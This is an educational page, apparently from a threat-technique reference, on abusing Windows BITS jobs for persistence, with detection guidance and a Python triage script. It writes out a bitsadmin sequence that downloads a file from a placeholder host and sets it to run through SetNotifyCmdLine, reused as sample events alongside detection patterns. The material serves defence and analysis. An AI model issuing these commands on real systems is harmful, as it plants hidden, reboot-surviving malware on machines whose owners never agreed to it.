Persistence · beginner

BITS Jobs Persistence

Malware creates a Background Intelligent Transfer Service job that downloads and executes a payload on a trigger, abusing a trusted Windows service.

The Background Intelligent Transfer Service (BITS) is a legitimate Windows component that performs throttled, resumable file transfers in the background — it is what Windows Update and many installers use. BITS jobs are managed through the bitsadmin tool and the Start-BitsTransfer PowerShell cmdlet, and crucially a job can be configured to run an arbitrary command when the transfer completes or when an error occurs.

Attackers abuse this in two ways. First, BITS provides a stealthy download channel that blends into normal background network traffic and is handled by a trusted service process. Second, the job's SetNotifyCmdLine option turns BITS into a persistence and execution mechanism: the job can be set to re-run indefinitely with a long retry window, relaunching the attacker's command each time it fires. Because the work is brokered by svchost.exe hosting the BITS service rather than the malware's own process, the activity is easy to overlook.

BITS jobs survive reboots and can be created without administrative rights, which makes this a popular low-effort persistence choice for commodity loaders.

How it works

A persistence job is created and configured to run a command on notification, then resumed:

```text
bitsadmin /create updater
bitsadmin /addfile updater http://example/p.dat C:\Users\Public\p.dat
bitsadmin /SetNotifyCmdLine updater C:\Users\Public\p.exe NULL
bitsadmin /SetMinRetryDelay updater 60
bitsadmin /resume updater
```

The job's state — including the notify command line, file list, and retry timing — is stored in the BITS state database under %ALLUSERSPROFILE%\Microsoft\Network\Downloader\ (the qmgr.db / legacy qmgr0.dat files). The load-bearing artifacts are the job name, the remote URL, and the SetNotifyCmdLine target.

Detection & analysis

Static analysis:

  • In a captured sample, look for bitsadmin.exe command-line strings, the Start-BitsTransfer cmdlet, or direct use of the BITS COM interface (IBackgroundCopyManager, CLSID {4991D34B-80A1-4291-83B6-3328366B9097}). Strings such as SetNotifyCmdLine indicate execution intent, not just download.
  • Triage a live or imaged host by parsing the BITS state database (qmgr.db) with BitsParser or a forensics suite; long-lived jobs with a notify command line pointing at a user-writable binary are suspicious.
  • Review the Microsoft-Windows-Bits-Client/Operational event log offline for created and resumed jobs and their associated URLs.

Dynamic analysis:

  • Run the sample and monitor the Bits-Client/Operational log live: Event ID 3 logs job creation with the URL, and Event IDs 59 and 60 record transfer start and stop. Correlate with Sysmon Event ID 1 to catch the notify command being spawned by the BITS service host.
  • Watch for svchost.exe (hosting the BITS service) as the parent of an unexpected child process, or for bitsadmin.exe invoked with /SetNotifyCmdLine or /addfile arguments.

Detection rule hint:

Alert on bitsadmin.exe command lines containing /SetNotifyCmdLine, /addfile with an external URL, or unusually long /SetMinRetryDelay values, and on Start-BitsTransfer from script interpreters. The highest-signal indicator is a BITS job whose notify command line points to a binary in %AppData%, %Temp%, or %Public%.
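The rule hint above, and the dynamic-analysis correlation of Bits-Client events with Sysmon process creation, expressed as a small triage script. This is an added example, not code from the original page or from any vendor tool: the record field names (image, parent_command_line, job_title, url, and so on) are assumptions that mimic the Sysmon Event ID 1 and Bits-Client Event ID 3 shapes, the sample events are constructed, and the retry-delay threshold and list of script hosts are assumptions a team would tune.

```python
"""Added example: score process-creation and BITS-Client records for the
BITS persistence indicators in the rule hint. All inputs are constructed."""
from urllib.parse import urlparse

# Assumption: directories the hint names as high-signal for a notify target.
SUSPICIOUS_DIRS = ("\\appdata\\", "\\temp\\", "\\users\\public\\")
# Assumption: anything above this many seconds counts as an "unusually long" retry delay.
LONG_RETRY_SECONDS = 3600
# Assumption: interpreters from which Start-BitsTransfer is considered noteworthy.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def is_external_url(token):
    """True if token is an http(s) URL that does not point at the local host."""
    try:
        u = urlparse(token)
    except ValueError:
        return False
    return u.scheme in ("http", "https") and u.hostname not in (None, "localhost", "127.0.0.1")


def in_suspicious_dir(path):
    """True if a Windows path sits under %AppData%, %Temp% or %Public%."""
    p = path.lower().replace("/", "\\")
    return any(d in p for d in SUSPICIOUS_DIRS)


def analyze_bitsadmin(cmd):
    """Return the indicators found in one bitsadmin.exe command line."""
    reasons = []
    tokens = cmd.split()
    lowered = [t.lower() for t in tokens]
    if "/setnotifycmdline" in lowered:
        reasons.append("bitsadmin /SetNotifyCmdLine (execution on completion)")
        i = lowered.index("/setnotifycmdline")
        # Syntax: /SetNotifyCmdLine <job> <program> <params>
        if i + 2 < len(tokens) and in_suspicious_dir(tokens[i + 2]):
            reasons.append("notify target in user-writable directory: " + tokens[i + 2])
    if "/addfile" in lowered and any(is_external_url(t) for t in tokens):
        reasons.append("bitsadmin /addfile with external URL")
    if "/setminretrydelay" in lowered:
        i = lowered.index("/setminretrydelay")
        # Syntax: /SetMinRetryDelay <job> <seconds>
        if i + 2 < len(tokens) and tokens[i + 2].isdigit() and int(tokens[i + 2]) > LONG_RETRY_SECONDS:
            reasons.append("long /SetMinRetryDelay: %s s" % tokens[i + 2])
    return reasons


def analyze_process_event(ev):
    """Apply the rule hint to one process-creation record (Sysmon Event ID 1 shape, assumed)."""
    reasons = []
    image = ev["image"].lower()
    parent_cmd = ev.get("parent_command_line", "").lower()
    cmd = ev.get("command_line", "")
    if image.endswith("\\bitsadmin.exe"):
        reasons += analyze_bitsadmin(cmd)
    if "start-bitstransfer" in cmd.lower() and any(image.endswith("\\" + h) for h in SCRIPT_HOSTS):
        reasons.append("Start-BitsTransfer from script interpreter")
    # svchost.exe hosting the BITS service (-s BITS) spawning something outside %SystemRoot%
    # is the notify command firing; this is the Sysmon side of the correlation.
    if "svchost.exe" in parent_cmd and "-s bits" in parent_cmd and not image.startswith("c:\\windows\\"):
        reasons.append("BITS service host spawned unexpected child: " + ev["image"])
    return reasons


def analyze_bits_client_event(ev):
    """Apply the hint to a Bits-Client/Operational job-creation record (field names assumed)."""
    reasons = []
    if ev.get("event_id") == 3 and is_external_url(ev.get("url", "")):
        reasons.append("BITS job %r created for external URL %s" % (ev.get("job_title"), ev["url"]))
    return reasons


def triage(events):
    """Return [(index, [reasons...])] for every record that trips at least one indicator."""
    findings = []
    for i, ev in enumerate(events):
        reasons = analyze_process_event(ev) if ev["source"] == "sysmon" else analyze_bits_client_event(ev)
        if reasons:
            findings.append((i, reasons))
    return findings


# Constructed sample records; not real telemetry.
SAMPLE_EVENTS = [
    {"source": "sysmon", "image": r"C:\Windows\System32\bitsadmin.exe", "parent_command_line": "cmd.exe",
     "command_line": r"bitsadmin /addfile updater http://example/p.dat C:\Users\Public\p.dat"},
    {"source": "sysmon", "image": r"C:\Windows\System32\bitsadmin.exe", "parent_command_line": "cmd.exe",
     "command_line": r"bitsadmin /SetNotifyCmdLine updater C:\Users\Public\p.exe NULL"},
    {"source": "sysmon", "image": r"C:\Windows\System32\bitsadmin.exe", "parent_command_line": "cmd.exe",
     "command_line": "bitsadmin /SetMinRetryDelay updater 86400"},
    {"source": "sysmon", "image": r"C:\Users\Public\p.exe", "command_line": r"C:\Users\Public\p.exe",
     "parent_command_line": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
    {"source": "sysmon", "image": r"C:\Windows\System32\bitsadmin.exe", "parent_command_line": "cmd.exe",
     "command_line": "bitsadmin /list /allusers"},  # benign admin use
    {"source": "sysmon", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_command_line": "cmd.exe",
     "command_line": r'powershell -c "Start-BitsTransfer -Source http://example/p.dat -Destination C:\Users\Public\p.dat"'},
    {"source": "bits_client", "event_id": 3, "job_title": "updater", "url": "http://example/p.dat"},
]

if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(idx, "; ".join(why))
```

The benign `bitsadmin /list /allusers` record produces no finding, which is the point of keying on the switches that carry execution intent rather than on bitsadmin.exe alone; in production the same functions would be fed from the Sysmon and Bits-Client channels rather than the constructed list.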
